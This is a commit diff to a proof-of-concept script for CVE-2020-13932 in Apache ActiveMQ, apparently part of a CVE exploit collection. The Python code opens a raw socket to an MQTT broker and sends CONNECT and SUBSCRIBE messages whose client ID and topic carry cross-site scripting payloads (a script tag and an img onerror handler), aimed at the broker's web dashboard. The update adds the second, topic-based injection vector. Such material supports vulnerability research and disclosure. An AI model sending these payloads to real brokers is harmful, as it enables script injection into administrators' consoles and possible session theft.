update cve/apache-activemq/2020/CVE-2020-13932/poc.py.

Signed-off-by: ZodiacLyu <lvyusong@buaa.edu.cn>

cve/apache-activemq/2020/CVE-2020-13932/poc.py

@@ -1,18 +1,22 @@
-from scapy.contrib.mqtt import *
-from scapy.compat import raw
 import time
 import socket
+from scapy.contrib.mqtt import *
+from scapy.compat import raw
 
-brokerIP = "" # input the server IP here
-brokerPort = 1883 # The default listen port of MQTT is 1883
-clientid = "<script>alert(1)</script>" # malformed clientid
+brokerIP = ""  # input the server IP here
+brokerPort = 1883  # The default listen port of MQTT is 1883
+clientid = "<script>alert(0)</script>" #Malformed Clientid
+malformedTopic = "<img src=\"1.1.1.1\" onerror=\"alert(1)\">"  # Malformed Topic
 
 if __name__ == '__main__':
     connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid)
-    # craft the malformed connect message
+    # Malformed Connect Message
+    subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1)
+    # Malformed Subscribe Message
     conn = socket.socket()
     conn.connect((brokerIP, brokerPort))
     conn.send(raw(connMessage))
-    # Then check the dashboard to see malformed connection
-    time.sleep(20)
-    conn.close()
+    time.sleep(1)
+    conn.send(raw(subMessage))
+    input() # Keep the MQTT Connection
+    conn.close()